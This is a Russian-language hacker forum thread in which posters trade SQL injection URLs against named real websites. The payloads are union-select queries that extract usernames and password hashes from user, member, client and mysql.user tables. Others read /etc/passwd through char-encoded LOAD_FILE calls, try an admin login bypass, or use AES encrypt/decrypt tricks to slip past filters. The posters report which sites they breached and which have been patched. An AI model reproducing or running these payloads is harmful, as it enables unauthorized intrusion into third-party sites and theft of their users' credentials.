SQL Инъекции

http://www.superski.ru/adm/show.php?news_id=-1056+union+select+1,2,3,4,5,6,7/*

 

то ли пофиксали, то ли временно не доступно
"Error reading database"

 

Пробелы убираем

 

sql inj

local inc

 

Code:

http://www.xfoto.ru/foto_alone.php?p_id=-99'+union+select+1,2,concat(login,0x3a,password),4+from+users/*

админка:
http://www.xfoto.ru/admin/
asd' or 1=1/* ... =\

 

вроде всё убрал... после еще раз попробую

 

Code:

http://www.kontec.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

 

=))

 

Code:

www.comingsoon.net/news.php?id='

 

Code:

http://www.autobalt.ru/catalog/models.php?marka_id=-1+union+select+1,2,database(),4,5,6,7/*

//upd:

попутно..
скулька на сайте веб-дизайнеров, создавших вышеуказанный сайт)

Code:

http://www.eto-design.ru/catalog/?top_id=1&s_id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),6,7,8/*

 

))

 

kamaz

Code:

http://www.pythom.com/news.php?id=1193%20union%20select%201,user,password,4,5,6,7+from+mysql.user+limit+1,2/*

Code:

http://www.pythom.com/news.php?id=1193%20union%20select%201,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7+from+mysql.user/*

Code:

http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),email),6+from+users/*

Пароли не нашёл

Code:

http://privet.zp.ua/place.php3?id=-1+union+select+1/*

Code:

http://www.ajsquare.com/demo/forum_demo/topic_title.php?&head_id=20&td_id=-1%20union%20select%200,1,2,3,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),6,7,8,9,1,1,2,2,2%20from%20members/*&page=1

 

Code:

http://www.voyage-luxe.ru/chapter532.html?uid=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),3,4,5,6,7+from+mysql.user/*

уух) долго возился..
без криптования не катит =d
логин и hash в тайтле окна)
//upd:

Code:

http://www.voyage-luxe.ru/chapter8.html?uid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),4,5+from+mysql.user+limit+1,1/*

 

Code:

http://www.diac.ru/news/comments.php?news_id=-99+union+select+1,concat(convert(login+using+cp1251),0x3a,convert(password+using+cp1251)),3,4,5,6,7,8+from+clients/*&sortirovka=id

Code:

http://relaxmusic.info/news_print.php?ntpl=1&print_id=-99+union+select+1,2,table_name,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*

=\

 

Первый Альтернативный Музыкальный Телеканал

Code:

http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,user(),4,5/*

 

2 n0ne
баянище =)

вот вам, убивайте себе моск. там пятая версия =)

 

сколько можно =\ уже раз 10ый наверно написали =\

 

Spyder, ice1k, да все в тэгах постят, по поиску не найдешь)) а листать каждый раз лениво, так что извиняйте.

 

2Goudini
http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(username,char(58),password),6+from+frb_user_login/* вот пассы ток хз от чего, а вообще кажеться что пассы в таблицы users лежат в колонке sifra

 

и вот хоть один бы, кроме этого...:

Code:

-1163+union+select+1,2,user(),4,5/*

... 4ё-нить бы написал путнего =\